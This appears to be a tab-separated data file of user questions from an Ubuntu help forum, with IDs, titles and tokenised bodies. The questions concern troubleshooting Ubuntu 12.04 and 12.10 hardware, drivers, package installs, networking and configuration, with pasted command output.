266717	lenovo x230 trackpad stopped working	i wonder if any person has any ideas for help . i have a lenovo x230 running ubuntu 12.04.2 which was working fine until a recent reboot . after which the touchpad has stopped working . the trackpointer and external mice all still work and touchpad is not disabled in bios . the buttons in the touchpad also work fine . would anyone have any suggestions as to why there would have stopped working or where to look for further clues . in dmesg i have the following $ dmesg | grep -i touch [ 24.031229 ] psmouse serio1 : synaptics : touchpad model : 1 , fw : 8.1 , id : 0x1e2b1 , caps : 0xd002a3/0x940300/0x123800 [ 24.031240 ] psmouse serio1 : synaptics : serio : synaptics pass-through port at isa0060/serio1/input0 [ 24.066062 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input13 and uname linux derp 3.5.0-25-generic # 39~precise1-ubuntu smp tue feb 26 00:07:14 utc 2013 x86_64 x86_64 x86_64 gnu/linux
266719	new monitor/tv , overscans ( ? ) in 1920x1080 in ubuntu	i have a new tm2792s monitor/tv . it does not look good in 1920x1080 , the unity menu is barely visible and also the top panel . so it looks like it overscans . my xorg.conf is only configured to use nvidia as driver , nothing else . this is my xorg.0.log : http : //paste.ubuntu.com/5606146/ there are alot of rows like this : [ 14466.180 ] ( ww ) nvidia ( gpu-0 ) : the edid for lg electronics tm2792 ( dfp-1 ) contradicts itself : [ 14466.181 ] ( ww ) nvidia ( gpu-0 ) : mode `` 1920x1080 '' is specified in the edid ; however , the [ 14466.181 ] ( ww ) nvidia ( gpu-0 ) : edid 's valid vertrefresh range ( 58.000-62.000 hz ) would [ 14466.181 ] ( ww ) nvidia ( gpu-0 ) : exclude this mode 's vertrefresh ( 50.0 hz ) ; ignoring [ 14466.181 ] ( ww ) nvidia ( gpu-0 ) : vertrefresh check for mode `` 1920x1080 '' . xrandr gives this output : $ xrandr screen 0 : minimum 8 x 8 , current 1920 x 1080 , maximum 8192 x 8192 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) vga-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 598mm x 337mm 1920x1080 60.0*+ 60.0 59.9 50.0 30.0 25.0 24.0 30.0 30.0 25.0 1360x768 60.0 1280x1024 60.0 1280x720 60.0 59.9 50.0 1152x864 60.0 1024x768 60.0 800x600 60.3 720x576 50.0 25.0 720x480 59.9 640x480 60.0 59.9 59.9 i found this command to make it look better : nvidia-settings -- assign currentmetamode= '' dfp-1 : 1920x1080 { viewportout=1850x1045+40+20 , viewportin=1920x1080 } '' but , with this you still see that the resolution is somehow wrong , it 's not 1:1 pixel-mapped afaik .
266721	gnome 3 empathy can`t get the menu toolbar to show	i can`t get empathy to show me the menu toolbar in ubuntu 12.10 in gnome . when i log in in unity , i can see the toolbar on the top , but that is not much comfy to need to go to unity whenever i want to tweak settings . thanks , viktor
266724	booting computer on drive with windows shows grub menu , want to remove the menu & boot ubuntu from bios disk selection	i have windows 7 ( my primary os ) installed on my ssd , and i recently installed ubuntu 12.10 ( i only use it occasionally ) on a partition i made of my hdd which i also use to store files on . my bios is set to start my ssd by default . whenever i boot , i see the grub menu asking for which os to boot ( windows 7 or ubuntu and other recovery versions of ubuntu ) . i want windows 7 to boot automatically , and never show grub menu again . i want to be able to boot ubuntu when i need it from my bios by selecting my hdd or the partition i made for ubuntu from the boot disk selection menu in my bios . thanks .
266726	splitcam equivalent	i want to share the webcam ( logitech quickcam pro 9000 ) picture with more than one application at the same time . i 've looked around the net . here 's what i found : - webcamstudio : the newest java tar-gz version does not even show the webcam picture - v4l2loopback : the afaik most interesting approach . however , i seem to need mjpegtools_yuv_to_v4l . as i 'm unable to compile it on lubuntu 12.10 , i installed intrepid in a vm and compiled it there . ffmpeg -f video4linux2 -i /dev/video0 -s 1280x1024 -r 5 -pix_fmt yuv420p -sws_flags lanczos -s 160x120 -r 5 -f yuv4mpegpipe -an - | ./mjpegtools_yuv_to_v4l /dev/video1 leads to input # 0 , video4linux2 , from '/dev/video0 ' : duration : n/a , start : 303506.618990 , bitrate : 147456 kb/s stream # 0.0 : video : rawvideo , yuyv422 , 640x480 , 147456 kb/s , 30 tbr , 1000k tbn , 30 tbc [ buffer @ 0x1659200 ] w:640 h:480 pixfmt : yuyv422 [ scale @ 0x1658860 ] w:640 h:480 fmt : yuyv422 - > w:160 h:120 fmt : yuv420p flags:0x200 output # 0 , yuv4mpegpipe , to 'pipe : ' : metadata : encoder : lavf53.21.1 stream # 0.0 : video : rawvideo , yuv420p , 160x120 , q=2-31 , 200 kb/s , 90k tbn , 5 tbc stream mapping : stream # 0.0 - > # 0.0 press ctrl-c to stop encoding mjpegtools_yuv_to_v4l : ioctl ( vidiocgcap ) : inappropriate ioctl for device mjpegtools_yuv_to_v4l : starting video stream . mjpegtools_yuv_to_v4l : error writing to pipe , aborting . sometimes , these error messages do not appear , but the prompt is returning immediately , althrough i can confirm that ffmpeg is sending some data through the pipe . in short : i ca n't get it to work . am i using the loopback driver wrong ? i could n't find anything helpful on how to use the driver , esp . how to feed it with input . thank you very much : )
266730	how to use ubuntu 12.10 from a usb stick in a lenovo ideapad g580 with windows 8 ?	i have a lenovo ideapad g580 with windows 8 from the box . when i insert a usb stick with ubuntu 12.10 64-bit , it is just giving me to try it , not to run it from the usb . when i put it on my other laptop it is just running and i can save data and files , and when i shutdown the laptop the data are n't deleted . and on the lenovo when i work on ubuntu , all the data after restarting the system are deleted .
266732	amd athlon ii x2 270 performance	i want to buy a new pc . i want to know how does this cpu works fine on ubuntu . it 's an amd athlon ii x2 270 . i 'm not asking for a review . i just want to know if it works fine on ubuntu , because i 've had some problems with other processors ( drivers , mainly ) . if it does n't , maybe you could recommend me another ( better ) processor a bit cheaper . thanks !
266733	google calendar events do not appear in evolution	i am trying to sync google calendar with evolution email client . i am not able to see any of my calendar events in evolution , however when in the gnome shell , i can see the events listed in the clock calendar . if i add a new event using thunderbird or on-line , the new events appears in the clock calendar , but again does not show up in evolution . so evolution is syncing , but the calendar entry does not appear in the calendar . i can add a calendar entry in evolution , however , the entry does not appear in evolution , but does update in the on-line google calendar . so it is syncing fine , but does not display . in fact no calendar entries are being displayed , even if i add an entry to a local 'on computer ' calendar ... . any ideas ? a known bug in this version ? evolution version : 3.6.2 ubuntu 12.10 64 bit also reported this as a possible bug ...
266735	generate a list of available commands and what each does	does a linux command set with descriptions exist on the net ? i have a list of commands i obtained by using alt ! with 1947 commands listed . i put these into a file but i am having to write what each command does by using the whatis command and then copying the result next to the command in the text document . thank you ; sherman
266736	thunderbird crashes on startup and get error about not starting jetty	just installed ubuntu 12.10 64-bit from disks included with ubuntu magazine alongside windows 7 and dual boot works perfectly . i 'm on an alienware aurora r3 system , 8 gb ram , two hdd of 1tb . i can run libre office , firefox , etc . however thunderbird crashes upon startup . the text screen goes by quickly , but i do see a red warning that jetty failed to startup . how do i resolve it ?
266737	ubuntu release calendar , is it maintained ?	i am subscribed to the ubuntu release calendar . but recently , it seems that all of the events there have disappeared . is it being shut down or something ? is there any alternative with ubuntu releases and key events ?
266738	how to truncate all logfiles ?	can anybody give me a solution to truncate all logfile in /var/log/ directory ? and a question just for knowledge , is it a good idea or not ? # ! /bin/bash logdir= '' /var/log '' for logfile in $ ( ls $ logdir/*log ) do truncate -s 0 $ logfile done
266739	ca n't start ethernet network connection	after electric surge grub loader has stoped working which i fixed with 'grub-install ' , but now i ca n't make ethernet working again . bootable version of ubuntu does n't working too . what is the lowest-level eth0 recovery steps there is that i could apply to my problem ? ifconfig : eth0 link encap : ethernet hwaddr 00:1d:04:4b : c4 : bd inet6 addr : fe80 : :23d:9ff : fe4b : c4bd/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:302 errors:0 dropped:0 overruns:0 frame:0 tx packets:343 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:20208 ( 20.2 kb ) tx bytes:74524 ( 74.5 kb ) interrupt:16 lo link enc ap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:756 errors:0 dropped:0 overruns:0 frame:0 tx packets:756 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:87621 ( 87.6 kb ) tx bytes:87621 ( 87.6 kb )
266742	can not install goldendict because of package dependencies	i 'm running 32-bit ubuntu 12.10 . software center fails to install goldendict because of some package dependencies . the error message looks like this : the following packages have unmet dependencies : goldendict : depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu20 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.7.2-2ubuntu1 is to be installed depends : libphonon4 ( > = 4:4.3.0 ) but it is not going to be installed depends : libqt4-network ( > = 4:4.5.3 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed depends : libqt4-xml ( > = 4:4.5.3 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed depends : libqtwebkit4 ( > = 2.2~2011week36 ) but 2.2.1-4ubuntu1 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.7.2-2ubuntu1 is to be installed depends : libvorbisfile3 ( > = 1.1.2 ) but 1.3.2-1.3 is to be installed depends : phonon but it is not going to be installed depends : zlib1g ( > = 1:1.2.0 ) but 1:1.2.7.dfsg-13 is to be installed the output for lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal the output for cat /etc/apt/sources.list arsen @ arsen-vgn-ns325j : ~ $ cat /etc/apt/sources.list deb http : //archive.ubuntu.com/ubuntu quantal multiverse universe any suggestions would be more than appreciated . thank you in advance .
266744	can not install bumblebee to the ubuntu 12.10 ?	if i try to install bumblebee with following command : sudo apt-get install bumblebee bumblebee-nvidia i face with following output end with double error need to get 0 b/60.7 kb of archives . after this operation , 240 kb of additional disk space will be used . selecting previously unselected package bumblebee . ( reading database ... 417120 files and directories currently installed . ) unpacking bumblebee ( from ... /bumblebee_3.1-1~quantalppa1_amd64.deb ) ... selecting previously unselected package bumblebee-nvidia . unpacking bumblebee-nvidia ( from ... /bumblebee-nvidia_3.1-1~quantalppa1_amd64.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... setting up bumblebee ( 3.1-1~quantalppa1 ) ... adding members from group ( s ) 'adm sudo admin ' to 'bumblebee ' : erogol adding user erogol to group bumblebee update-initramfs : deferring update ( trigger activated ) fatal : module bbswitch not found . invoke-rc.d : initscript bumblebeed , action `` start '' failed . dpkg : error processing bumblebee ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of bumblebee-nvidia : bumblebee-nvidia depends on bumblebee ( = 3.1-1~quantalppa1 ) ; however : package bumblebee is not configured yet . dpkg : error processing bumblebee-nvidia ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . processing triggers for ureadahead ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-24-generic errors were encountered while processing : bumblebee bumblebee-nvidia e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i could not find out the reason . is there any suggestion for the error ?
266746	problem with installation of language	i wanted the system language to be in korean . when i went to language support and loaded korean , i had got the next message : installarchives ( ) failed : selecting previously unselected package fonts-nanum . ( reading database ... 100 % ( reading database ... 230075 files and directories currently installed . ) unpacking fonts-nanum ( from ... /fonts-nanum_3.020-1ubuntu1_all.deb ) ... selecting previously unselected package language-pack-gnome-ko-base . unpacking language-pack-gnome-ko-base ( from ... /language-pack-gnome-ko-base_1 % % 3a12.10+20121009_all.deb ) ... selecting previously unselected package language-pack-ko-base . unpacking language-pack-ko-base ( from ... /language-pack-ko-base_1 % % 3a12.10+20121009_all.deb ) ... selecting previously unselected package language-pack-ko . unpacking language-pack-ko ( from ... /language-pack-ko_1 % % 3a12.10+20121009_all.deb ) ... selecting previously unselected package language-pack-gnome-ko . unpacking language-pack-gnome-ko ( from ... /language-pack-gnome-ko_1 % % 3a12.10+20121009_all.deb ) ... selecting previously unselected package kde-l10n-ko . unpacking kde-l10n-ko ( from ... /kde-l10n-ko_4 % % 3a4.9.5-0ubuntu0.1_all.deb ) ... selecting previously unselected package language-pack-kde-ko . unpacking language-pack-kde-ko ( from ... /language-pack-kde-ko_1 % % 3a12.10+20121005.1_all.deb ) ... selecting previously unselected package firefox-locale-ko . unpacking firefox-locale-ko ( from ... /firefox-locale-ko_19.0.2+build1-0ubuntu0.12.10.1_i386.deb ) ... selecting previously unselected package fonts-nanum-coding . unpacking fonts-nanum-coding ( from ... /fonts-nanum-coding_2.0-4ubuntu1_all.deb ) ... selecting previously unselected package fonts-unfonts-core . unpacking fonts-unfonts-core ( from ... /fonts-unfonts-core_1.0.3.is.1.0.2-080608-5ubuntu2_all.deb ) ... selecting previously unselected package hunspell-ko . unpacking hunspell-ko ( from ... /hunspell-ko_0.5.5-1_all.deb ) ... selecting previously unselected package ibus-hangul . unpacking ibus-hangul ( from ... /ibus-hangul_1.4.1-1_i386.deb ) ... selecting previously unselected package libreoffice-l10n-ko . unpacking libreoffice-l10n-ko ( from ... /libreoffice-l10n-ko_1 % % 3a3.6.2~rc2-0ubuntu4_all.deb ) ... selecting previously unselected package libreoffice-help-ko . unpacking libreoffice-help-ko ( from ... /libreoffice-help-ko_1 % % 3a3.6.2~rc2-0ubuntu4_all.deb ) ... selecting previously unselected package thunderbird-locale-ko . unpacking thunderbird-locale-ko ( from ... /thunderbird-locale-ko_1 % % 3a17.0.3+build1-0ubuntu0.12.10.1_i386.deb ) ... processing triggers for fontconfig ... processing triggers for software-center ... info : softwarecenter.db.update : translation information in database is up-to-date processing triggers for hicolor-icon-theme ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... setting up postgresql-common ( 129ubuntu1 ) ... * starting postgresql 8.4 database server [ ok ] * starting postgresql 9.1 database server * the postgresql server failed to start . please check the log output : 2013-03-11 23:54:20 gmt fatal : data directory `` /var/lib/postgresql/9.1/main '' has group or world access 2013-03-11 23:54:20 gmt detail : permissions should be u=rwx ( 0700 ) . [ fail ] invoke-rc.d : initscript postgresql , action `` start '' failed . dpkg : error processing postgresql-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up fonts-nanum ( 3.020-1ubuntu1 ) ... setting up kde-l10n-ko ( 4:4.9.5-0ubuntu0.1 ) ... setting up firefox-locale-ko ( 19.0.2+build1-0ubuntu0.12.10.1 ) ... setting up fonts-nanum-coding ( 2.0-4ubuntu1 ) ... setting up fonts-unfonts-core ( 1.0.3.is.1.0.2-080608-5ubuntu2 ) ... setting up hunspell-ko ( 0.5.5-1 ) ... setting up ibus-hangul ( 1.4.1-1 ) ... setting up libreoffice-l10n-ko ( 1:3.6.2~rc2-0ubuntu4 ) ... setting up libreoffice-help-ko ( 1:3.6.2~rc2-0ubuntu4 ) ... setting up thunderbird-locale-ko ( 1:17.0.3+build1-0ubuntu0.12.10.1 ) ... setting up language-pack-ko ( 1:12.10+20121009 ) ... setting up language-pack-ko-base ( 1:12.10+20121009 ) ... generating locales ... ko_kr.utf-8 ... hash collision ( 1701936715 ) ko_kr.utf8 , es_co.utf8 failed generation complete . setting up language-pack-gnome-ko ( 1:12.10+20121009 ) ... setting up language-pack-kde-ko ( 1:12.10+20121005.1 ) ... setting up language-pack-gnome-ko-base ( 1:12.10+20121009 ) ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... errors were encountered while processing : postgresql-common error in function : setting up postgresql-common ( 129ubuntu1 ) ... * starting postgresql 8.4 database server [ ok ] * starting postgresql 9.1 database server * the postgresql server failed to start . please check the log output : 2013-03-11 23:54:29 gmt fatal : data directory `` /var/lib/postgresql/9.1/main '' has group or world access 2013-03-11 23:54:29 gmt detail : permissions should be u=rwx ( 0700 ) . [ fail ] invoke-rc.d : initscript postgresql , action `` start '' failed . dpkg : error processing postgresql-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1
266754	making files case insensitive at startup	i would like to have the files on my hard drives always be displayed case insensitive ; i.e. , from start-up every time . what is the easiest to do this ? i am new to linux and ubuntu but am learning quickly , using 12.10 . i want to have my mp3 files in the gui be listed purely alphabetically : aabbcc , not abcabc as they appear now . if there 's a way to make file names all one case , i 'd do that . i have files for bands beginning in both upper and lower case for the same bands ; thousands of them . i want the band names to appear in one group .
266756	how can i get rid of the gnome volume overlay ?	i installed gnome shell a while back , but then removed it . however , even while using unity , i still get gnome-style volume overlays/notifications . how can i get back the default unity-style volume notification ?
266758	how to set up environment variable properly ?	i opened the /etc/environment and added the line android_sdk_home= '' /home/tom/android-sdk '' but i tried echo $ android_sdk_home but displayed nothing . i have java_home in the same /etc/environment but its working . please help me fix the problem . thanks in advance .
266761	a strange issue with open programs	recently my speakers stopped working . i was able to work it out with this https : //help.ubuntu.com/community/soundtroubleshootingprocedure while i was happy to have sound back , it came with a larger problem . the 'windows ' around open programs are n't there . i do n't know if there 's a term for it , but the border around things with the close button and everything just is n't there . some things ( like the internet ) i 'm simply unable to close , nor can i access any other programs without logging out completely . i 'm using a xubuntu desktop , and i do n't have the issues with the ubuntu desktop . i know i could just use that , but i really just ca n't stand it . i also seem to be unable to right click anything . does anyone please have a solution ?
266764	ca n't seem to get wine to install `` package dependencies can not be resolved ''	just built a new computer . been using ubuntu for years now and was naturally what i put on the new box . tried to install wine through the `` ubuntu software center '' but got `` package dependencies can not be resolved '' in a window with : the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.1.2ubuntu7.1 is to be installed depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu10.3 is to be installed depends : wine1.4-amd64 ( = 1.4-0ubuntu4.1 ) but 1.4-0ubuntu4.1 is to be installed depends : wine1.4-i386 ( = 1.4-0ubuntu4.1 ) but it is a virtual package how do i fix this ? fwiw : i 'm running ubuntu 12.04 ( 64 bit ) any insight would be very appreciated !
266767	how to stop networkmanager ?	is there any way to stop networkmanager applet and switch to manual configuration of /etc/network/interfaces ?
266768	ubuntu 12.10 trouble installing netbeans 7.3 and java me 32 bit	i tried chmod , updating , simple terminal line commands and nothing seems to work . when i try install netbeans 7.3 the screen is blank and if i try to do something it gives me the error that states the application will close and asks for a force quit option and says all progress will be lost . any ideas ? i have been to both the netbeans forums and asked as well as the java boards which directed me back to netbeans forum page .
266771	overheating processors - ubuntu 12.10	i have an hp pavilion dv4 , and i have many problems with the hardware of the machine and the software . here i describe the bios information acpi 2.0 present . oem identifier : hpqoem rsd table 32-bit address : 0xacffe0ac xsd table 64-bit address : 0x00000000acffe120 pnp bios 1.0 present . event notification : not supported real mode 16-bit code address : f000 : b884 real mode 16-bit data address : 0040:0000 16-bit protected mode code address : 0x000fb88f 16-bit protected mode data address : 0x00000400 oem device identifier : sst2400 smbios 2.7 present . structure table length : 1901 bytes structure table address : 0x000e6830 number of structures : 39 maximum structure size : 162 bytes bios32 service directory present . revision : 0 calling interface address : 0x000ef725 pci interrupt routing 1.0 present . router id : 00:1f.0 exclusive irqs : none compatible router : 8086:122e slot entry 1 : id 00:01 , on-board slot entry 2 : id 00:02 , on-board slot entry 3 : id 00:04 , on-board slot entry 4 : id 00:06 , on-board slot entry 5 : id 01:00 , on-board slot entry 6 : id 02:00 , on-board slot entry 7 : id 08:00 , on-board slot entry 8 : id 00:16 , on-board slot entry 9 : id 00:18 , on-board slot entry 10 : id 00:19 , on-board slot entry 11 : id 00:1a , on-board slot entry 12 : id 00:1b , on-board slot entry 13 : id 00:1c , on-board slot entry 14 : id 00:1d , on-board slot entry 15 : id 00:1f , on-board the information of hardware : producto : 2nd generation core processor family dram controller producto : 2nd generation core processor family integrated graphics controller producto : 3585 producto : 6 series/c200 series chipset family 6 port sata ahci controller producto : 6 series/c200 series chipset family high definition audio controller producto : 6 series/c200 series chipset family mei controller # 1 producto : 6 series/c200 series chipset family pci express root port 1 producto : 6 series/c200 series chipset family pci express root port 3 producto : 6 series/c200 series chipset family pci express root port 5 producto : 6 series/c200 series chipset family smbus controller producto : 6 series/c200 series chipset family usb enhanced host controller # 1 producto : 6 series/c200 series chipset family usb enhanced host controller # 2 producto : ar8151 v2.0 gigabit ethernet producto : bddvdrw ct30l producto : centrino wireless-n 1030 producto : hm65 express chipset family lpc controller producto : hp pavilion dv4 notebook pc ( ly917la # abm ) producto : intel ( r ) core ( tm ) i5-2410m cpu @ 2.30ghz producto : m471b5273dh0-ch9 producto : mu06055 producto : oem_define5 producto : samsung hm641ji producto : sd/mmc host controller producto : standard sd host controller descripción : **vga compatible controller** producto : 2nd generation core processor family integrated graphics controller fabricante : intel corporation id físico : 2 información del bus : pci @ 0000:00:02.0 versión : 09 anchura : 64 bits reloj : 33mhz capacidades : msi pm vga_controller bus_master cap_list rom configuración : driver=i915 latency=0 recursos : irq:42 memoria : c0000000-c03fffff memoria : b0000000-bfffffff ioport:4000 ( size=64 ) no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal my problem is that processors overheat all time . temperature between 60 ° c and 85 ° c , with few programs operating . with windows the machine does n't overheat .
266772	why are there so many `` linux- '' kernel packages on my machine , and what do they all do ?	in my usage of ubuntu , i have noticed a baffling array of different linux kernel packages . some of them are listed below : linux-generic linux-headers-generic linux-headers-generic-pae linux-headers-x.x.xx-xx linux-headers-x.x.xx-xx-generic linux-image-generic linux-image-generic-pae linux-image-x.x.xx-xx-generic linux-image-x.x.xx-xx-generic-pae linux-image-extra-x.x.xx-xx-generic linux-image-extra-x.x.xx-xx-generic-pae my question is , why are there so many different kernel packages , often for the same version number ( e.g. , 3.5.0-24 ) , and what are the differences between them ?
266778	unable to get windows 8 comptuer to boot into live cd ubuntu 12.10	i have an asus x401a , brand new with windows 8 on it . it malfunctions every single day that i want to smash it to pieces . and so i want to install ubuntu . i burned a live cd ubuntu 12.10 , but when i restart the computer with the live cd inside the dvd drive , nothing happens , asus just boots into windows . why ?
266782	disable network manager password prompt after reconnect due to connection problem	i want to avoid any password prompt from ubuntu ( 12.04 ) network manager . i just want that the application works silently with the network and password that i gived to it and prompt for password just if i clicked on connect , but no automatically . the problem is that sometimes when the connection fails for any reason ( bad signal for example ) , the network manager ask again for the password . this question has been asked in other threads , without a concrete solution or it is impossible to change this behavior of the ubuntu network manager ? i need this option because , i will have a machine running in a public place showing some multimedia staff and i do n't want to have a password prompt window over my application if there is some network problem . by the other hand `` always on top '' could be an option , but i switch automatically from one app . to other sometimes , so this complicate the things a little . thanks !
266784	how to find the real size of a file partially downloaded from a torrent client , using the terminal ?	a certain program i 'm developing , requires to be fed with some file sizes on the disk , in order to work.. i 'm using the stat command in terminal to achieve this.. however , stat ca n't calculate the actual size of the files downloded from a bittorrent client . does anyone know a way to do it ? thanks !
266788	gnome-terminal issue	when i run gnome-terminal i get following error : glib-gio-error ** : no gsettings schemas are installed on the system trace/bpt trap anyone has idea what is missing ? where can i find it .
266793	can i use winkey ( super ) -1 , winkey-2 to select workspaces ?	after setting it up , it used to work flawlessly before unity . in 12.04 , there is the little annoyance of showing ( sometimes ) the shortcut help and the numbers in the launcher . in 12.10 ... it stopped working completely - starts the first , second etc application in the launcher . is there a way to use this combinations to switch between workspaces without changing the winkey unity function ? these are very convenient shortcuts ( single hand , without much stretching ) and there is no reason why unity should eat all winkey combinations in such a general and non-discriminating way . ; ) thanks in advance !
266794	youtube video loading porblem !	ok so yeah as the title say 's my youtube vids wont load.i do have java installed , and this is for the 64-bit version of ubuntu btw the version is 12.10 , to be even more specific the video just dosent load all the way , it wont load at all ! it just say 's a error has occurred any opinion 's ?
266796	is /etc/sudoers file only suppose to have read only permissions ?	-r -- r -- -- - 1 root root 723 jan 31 2012 sudoers my dist-update frequently fails . at boot my system frequently asks for file system check . ( my system-hardware is file ) i am using vkstp 3.5.0-25-generic # 39~precise1-ubuntu smp tue feb 26 00:07:14 utc 2013 x86_64 x86_64 x86_64 gnu/linux from root prompt , is it safe for me to do ( i donot know if that will work , as the file is read only ) chmod g+w /etc/sudors my user is added in root group vks @ vkstp : ~ $ sudo adduser vks root the user `vks ' is already a member of `root ' . please suggest , i may have superficial knowledge on perms , and i may be confusing things up . please let me know if there is any other important piece of information i am missing ?
266803	how to connect ubuntu to university lan ( windows , dynamic ips ) to use internet	i have recently switched from windows to ubuntu so i do n't know much about it . the issue is that i am unable to connect my ubuntu laptop with the computer laboratory of my university via lan cable so that i can use internet . when i had windows installed in my laptop , i would go to the lab and plugin the networking cable into my laptop 's socket . then i would disable the local area connection and then enable it . i had to disable it because in my university the computer science department provides internet to all other departments and it has multiple network names , for example network 24 , network 26 , etc . so every time i disabled and re-enabled the local area connection , it would connect my windows laptop to a random network and the internet turned on . secondly , the pcs in lab have specific ip addresses like 192.168.1.253 . but i did n't need to put any ip address or sub-net mask or anything in my local area connection 's properties . i would just have the settings on `` automatically obtain ip addresses '' and then i disabled and then enabled the local area connection . now i have installed ubuntu 12.10 in my laptop and i am unable to connect my laptop with university network for using internet . i put my ubuntu wired connection ipv4 settings to `` automatic dhcp '' , but it did n't connect me to internet . now plz do n't tell me to ask the lab administrator because he only knows how to open youtube : ) also do n't tell me to switch back to windows because i loathe viruses . please help me solving this . i need it because the university has acquired some online subscriptions so that students can access journals for the research work . i 'll be grateful for the help . p.s : following are the results of the codes ... ahmad @ ahmad-laptop : ~ $ lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 01 ) 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) 03:01.0 cardbus bridge : o2 micro , inc. oz601/6912/711e0 cardbus/smartcardbus controller ( rev 40 ) 09:00.0 ethernet controller : broadcom corporation netxtreme bcm5752 gigabit ethernet pci express ( rev 02 ) 0c:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) and ahmad @ ahmad-laptop : ~ $ sudo lshw -c network [ sudo ] password for ahmad : *-network unclaimed description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : dfdfc000-dfdfffff *-network description : ethernet interface product : netxtreme bcm5752 gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 02 serial : 00:14:22 : fa : dc : ba capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.123 firmware=5752-v3.19 latency=0 link=no multicast=yes port=twisted pair resources : irq:44 memory : dfcf0000-dfcfffff the result of ifconfig is following.. ahmad @ ahmad-laptop : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:14:22 : fa : dc : ba inet addr:192.168.1.101 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :214:22ff : fefa : dcba/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:16261 errors:0 dropped:0 overruns:0 frame:0 tx packets:378 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1275717 ( 1.2 mb ) tx bytes:41326 ( 41.3 kb ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:292 errors:0 dropped:0 overruns:0 frame:0 tx packets:292 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:21054 ( 21.0 kb ) tx bytes:21054 ( 21.0 kb )
266805	top source code compilation error	i have downloaded the top source code from the following location . http : //sourceforge.net/projects/unixtop/ ? source=dlp after extracting the code , i run the following command : ./configure make cc -dhave_config_h -i . -i . -i /usr/src/linux-headers-3.5.0-19/arch/alpha -g -o2 -wall -fno-strict-aliasing -o m_linux.o -c ./machine/m_linux.c ./machine/m_linux.c:71:44 : fatal error : asm/page.h : no such file or directory compilation terminated . make : *** [ m_linux.o ] error 1 please help
